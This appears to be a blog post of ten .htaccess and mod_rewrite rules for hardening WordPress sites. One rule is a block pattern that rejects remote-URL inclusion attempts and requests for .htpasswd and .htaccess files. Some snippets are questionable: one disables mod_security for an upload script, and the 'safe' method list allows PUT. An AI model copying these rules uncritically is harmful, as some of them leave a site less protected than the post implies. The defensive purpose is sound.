Advanced Mod_Rewrites Example From Wordpress Plugins
Here are some specific .htaccess examples taken mostly from WordPress Password Protection plugin, which does a lot more than password protection as you will see from the following mod_rewrite examples. These are a few of the mod_rewrite uses that BlogSecurity declared pushed the boundaries of Mod_Rewrite! Some of these snippets are quite exotic and unlike anything, you may have seen before, also only for those who understand them as they can kill a website pretty quick.
#1 - Directory Protection
Enable the DirectoryIndex Protection, preventing directory index listings and defaulting.
Options -Indexes DirectoryIndex index.html index.php /index.php
#2 - Password Protect wp-login.php
Requires a valid user/pass to access the login page
<Files wp-login.php> Order Deny,Allow Deny from All Satisfy Any AuthName "Protected By YourDomain" AuthUserFile /web/YourDomain.com/.htpasswda1 AuthType Basic Require valid-user </Files>
#3 - Password Protect wp-admin
Requires a valid user/pass to access any non-static (CSS, js, images) file in this directory.
Options -ExecCGI -Indexes +FollowSymLinks -Includes DirectoryIndex index.php /index.php Order Deny,Allow Deny from All Satisfy Any AuthName "Protected By YourDomain" AuthUserFile /web/YourDomain.com/.htpasswda1 AuthType Basic Require valid-user <FilesMatch "\.(ico|pdf|flv|jpg|jpeg|mp3|mpg|mp4|mov|wav|wmv|png|gif|swf|css|js)$"> Allow from All </FilesMatch> <FilesMatch "(async-upload)\.php$"> <IfModule mod_security.c> SecFilterEngine Off </IfModule> Allow from All </FilesMatch>
#4 - Protect wp-content
Denies any Direct request for files ending in .php with a 403 Forbidden. May break plugins/themes
RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /wp-content/.*$ [NC] RewriteCond %{REQUEST_FILENAME} !^.+flexible-upload-wp25js.php$ RewriteCond %{REQUEST_FILENAME} ^.+\.(php|html|htm|txt)$ RewriteRule .? - [F,NS,L]
#5 - Protect wp-includes
Denies any Direct request for files ending in .php with a 403 Forbidden. May break plugins/themes
RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /wp-includes/.*$ [NC] RewriteCond %{THE_REQUEST} !^[A-Z]{3,9}\ /wp-includes/js/.+/.+\ HTTP/ [NC] RewriteCond %{REQUEST_FILENAME} ^.+\.php$ RewriteRule .? - [F,NS,L]
#6 - Common Exploits
Block common exploit requests with 403 Forbidden. These can help a lot, may break some plugins.
RewriteCond %{REQUEST_URI} !^/(wp-login.php|wp-admin/|wp-content/plugins/|wp-includes/).* [NC] RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ ///.*\ HTTP/ [NC,OR] RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /.*\?\=?(http|ftp|ssl|https):/.*\ HTTP/ [NC,OR] RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /.*\?\?.*\ HTTP/ [NC,OR] RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /.*\.(asp|ini|dll).*\ HTTP/ [NC,OR] RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /.*\.(htpasswd|htaccess|dehtpasswd).*\ HTTP/ [NC] RewriteRule .? - [F,NS,L]
#7 - Stop Hotlinking
Denies any request for static files (images, CSS, etc) if the referrer is not local site or empty.
RewriteCond %{HTTP_REFERER} !^$ RewriteCond %{REQUEST_URI} !^/(wp-login.php|wp-admin/|wp-content/plugins/|wp-includes/).* [NC] RewriteCond %{HTTP_REFERER} !^https://www.YourDomain.com.*$ [NC] RewriteRule \.(ico|pdf|flv|jpg|jpeg|mp3|mpg|mp4|mov|wav|wmv|png|gif|swf|css|js)$ - [F,NS,L]
#8 - Safe Request Methods
Denies any request not using
RewriteCond %{REQUEST_METHOD} !^(GET|HEAD|POST|PROPFIND|OPTIONS|PUT)$ [NC] RewriteRule .? - [F,NS,L]
#9 - Forbid Proxies
Denies any POST Request using a Proxy Server. Can still access the site, but not comment.
RewriteCond %{REQUEST_METHOD} =POST RewriteCond %{HTTP:VIA}%{HTTP:FORWARDED}%{HTTP:USERAGENT_VIA}%{HTTP:X_FORWARDED_FOR}%{HTTP:PROXY_CONNECTION} !^$ [OR] RewriteCond %{HTTP:XPROXY_CONNECTION}%{HTTP:HTTP_PC_REMOTE_ADDR}%{HTTP:HTTP_CLIENT_IP} !^$ RewriteCond %{REQUEST_URI} !^/(wp-login.php|wp-admin/|wp-content/plugins/|wp-includes/).* [NC] RewriteRule .? - [F,NS,L]
#10 - Real wp-comments-post.php
Denies any POST attempt made to a non-existing wp-comments-post.php
RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /.*/wp-comments-post\.php.*\ HTTP/ [NC] RewriteRule .? - [F,NS,L]
And now we will cover further in the next part. Keep in touch. Please do share any of your best Feedback, suggestions or view in the comment section below.
No comment